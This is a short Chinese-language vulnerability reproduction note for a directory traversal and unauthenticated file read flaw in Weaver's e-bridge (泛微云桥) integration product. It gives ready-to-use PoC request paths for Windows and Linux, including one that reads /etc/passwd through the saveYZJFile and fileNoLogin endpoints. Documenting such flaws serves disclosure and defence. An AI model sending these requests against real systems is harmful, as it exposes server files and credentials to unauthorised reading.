泛微云桥e-bridge 目录遍历/文件读取漏洞

漏洞信息:¶

泛微云桥是一个为了满足用户提出的阿里钉钉与泛微OA集成需泛微0A云桥e-bridge 其 /wxjsapi/saveYZJFile 接口可以读取文件内容并保存，而后可通过/file/fileNoLogin/{id}，读取文件内容。

影响范围:¶

主要影响 2018-2019 版本

漏洞复现:¶

如果使用POC回显**"无法验证您的身份！"证明改漏洞已被修复 **POC中，当downloadUrl的路径为文件夹的时候结果为目录遍历 linux windows 通用 Windows POC：

/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt #查看页面中的id值

/file/fileNoLogin/<id> #访问文件接口，根据上一步获取的id对文件内容进行读取

如果提示msg "/C: (No such file or directory)"就表示为Linux系统（表示不存在C盘） Linux POC：

/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt
/file/fileNoLogin/<id> #访问文件接口，根据上一步获取的id对文件内容进行读取

04 实例¶

Linux系统主目录（根目录） Linux中/ect/passwd文件

修复方案:¶

尽快升级到最新版本